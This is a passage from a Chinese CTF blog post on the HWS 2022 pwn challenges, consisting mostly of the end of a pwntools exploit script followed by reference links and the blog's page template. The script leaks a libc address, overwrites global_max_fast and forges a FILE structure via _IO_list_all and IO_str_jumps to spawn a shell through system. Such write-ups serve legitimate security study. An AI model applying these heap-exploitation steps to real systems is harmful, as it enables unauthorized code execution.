is:&#x27;</span>)</span><br><span class="line">main_arena = u64(r.recv(<span class="number">6</span>) + <span class="string">b&#x27;\x00\x00&#x27;</span>)</span><br><span class="line">li(<span class="string">&quot;main_arena&quot;</span>, main_arena)</span><br><span class="line">libc_base = main_arena - <span class="number">0x3ebca0</span></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">global_max_fast = libc_base + <span class="number">0x3ed940</span></span><br><span class="line">IO_list_all = libc_base + libc.symbols[<span class="string">&#x27;_IO_list_all&#x27;</span>]</span><br><span class="line">IO_str_jumps = <span class="number">0x3e8360</span> + libc_base</span><br><span class="line">payload = p64(main_arena) + p64(global_max_fast - <span class="number">0x10</span>)</span><br><span class="line">binsh = <span class="number">0x00000000001b40fa</span> + libc_base</span><br><span class="line">sl(payload)</span><br><span class="line"><span class="comment"># debug()</span></span><br><span class="line">ru(<span class="string">&quot;Do you want to edit big box or bigger box?(1:big/2:bigger)\n&quot;</span>)</span><br><span class="line">sl(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">ru(<span class="string">&#x27;:\n&#x27;</span>)</span><br><span class="line">fake_file = pack_file(_IO_read_base=IO_list_all - <span class="number">0x10</span>,</span><br><span class="line">                      _IO_write_base=<span class="number">0</span>,</span><br><span class="line">                      _IO_write_ptr=<span class="number">1</span>,</span><br><span class="line">                      _IO_buf_base=binsh,</span><br><span class="line">                      _mode=<span class="number">0</span>, )</span><br><span class="line">fake_file += p64(IO_str_jumps - <span class="number">8</span>) + p64(<span class="number">0</span>) + p64(system)</span><br><span class="line">gdb.attach(r)</span><br><span class="line">pause()</span><br><span class="line">sl(fake_file[<span class="number">0x10</span>:])</span><br><span class="line"><span class="comment"># gdb.attach(r)</span></span><br><span class="line">ri()</span><br></pre></td></tr></table></figure>

<p><strong>比赛的时候没想到这样去改写_IO_list_all，属实是学到了</strong></p>
<p>参考文章</p>
<p><a class="link" target="_blank" rel="noopener" href="http://www.suphp.cn/anquanke/12/258512.html">360<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link" target="_blank" rel="noopener" href="https://blog.csdn.net/qq_42815161/article/details/122685385?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164421225616780366541045%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164421225616780366541045&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~times_rank-3-122685385.first_rank_v2_pc_rank_v29&utm_term=HWS+2022&spm=1018.2226.3001.4187">塞纳河畔的春水<i class="fas fa-external-link-alt"></i></a></p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>本文标题：题目复现</li>
        <li>本文作者：LOLOLO</li>
        <li>创建时间：2022-02-07 17:29:23</li>
        <li>
            本文链接：https://lololo-pwn.github.io/2022/02/07/题目复现/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/PWN/">#PWN</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2022/02/08/%E7%AE%80%E5%8D%95%E6%A0%88%E8%BF%81%E7%A7%BB/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">简单栈迁移</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/02/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">格式化字符串</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
            <div class="comment-container">
                <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fas fa-comments">&nbsp;评论</i>
    </div>
    

        
            
    <div class="valine-container">
        <script 
                src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script >
            function loadValine() {
                new Valine({
                    el: '#vcomments',
                    appId: '2XOGNqHIX6wo0G39qpF2OD4D-gzGzoHsz',
                    appKey: 'IiqSl8rLkJTPne7xAwnsukGL',
                    meta: ['nick', 'mail', 'link'],
                    avatar: 'wavatar',
                    enableQQ: true,
                    placeholder: '放马过来!',
                    lang: 'zh-CN'.toLowerCase()
                });

                function getAuthor(language) {
                    switch (language) {
                        case 'en':
                            return 'Author';
                        case 'zh-CN':
                            return '博主';
                        default:
                            return 'Master';
                    }
                }

                // Add "Author" identify
                const getValineDomTimer = setInterval(() => {
                    const vcards = document.querySelectorAll('#vcomments .vcards .vcard');
                    if (vcards.length > 0) {
                        let author = 'LOLOLO';

                        if (author) {
                            for (let vcard of vcards) {
                                const vnick_dom = vcard.querySelector('.vhead .vnick');
                                const vnick = vnick_dom.innerHTML;
                                if (vnick === author) {
                                    vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                                }
                            }
                        }
                        clearInterval(getValineDomTimer);
                    } else {
                        clearInterval(getValineDomTimer);
                    }
                }, 2000);
            }

            if ('false') {
                const loadValineTimeout = setTimeout(() => {
                    loadValine();
                    clearTimeout(loadValineTimeout);
                }, 1000);
            } else {
                window.addEventListener('DOMContentLoaded', loadValine);
            }
        </script>
    </div>



        
    
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2021</span>
              -
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">LOLOLO</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.5</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fas fa-comment"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9C%89%E5%85%B3scanf%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text">有关scanf的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#build-house"><span class="nav-number">1.1.</span> <span class="nav-text">build_house</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#view-house"><span class="nav-number">1.2.</span> <span class="nav-text">view_house</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#delet-house"><span class="nav-number">1.3.</span> <span class="nav-text">delet_house</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.4.</span> <span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-%E6%98%AF%E7%94%A8%E5%85%B6%E4%BB%96%E5%B8%88%E5%82%85%E7%9A%84%EF%BC%8C%E8%87%AA%E5%B7%B1%E5%BD%93%E6%97%B6%E6%83%B3%E4%B8%8D%E5%88%B0%EF%BC%8C%E5%90%8E%E6%9D%A5%E4%B9%9F%E6%B2%A1%E5%86%99"><span class="nav-number">1.5.</span> <span class="nav-text">exp(是用其他师傅的，自己当时想不到，后来也没写)</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#HWS-pwn1"><span class="nav-number">2.</span> <span class="nav-text">HWS pwn1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF-1"><span class="nav-number">2.1.</span> <span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%80%E5%90%8E%E6%94%BE%E4%B8%8A%E5%8E%9F%E9%A2%98exp"><span class="nav-number">2.2.</span> <span class="nav-text">最后放上原题exp</span></a></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/code-copy.js"></script>




<div class="post-scripts">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/js/toc.js"></script>
    
</div>



</body>
</html>
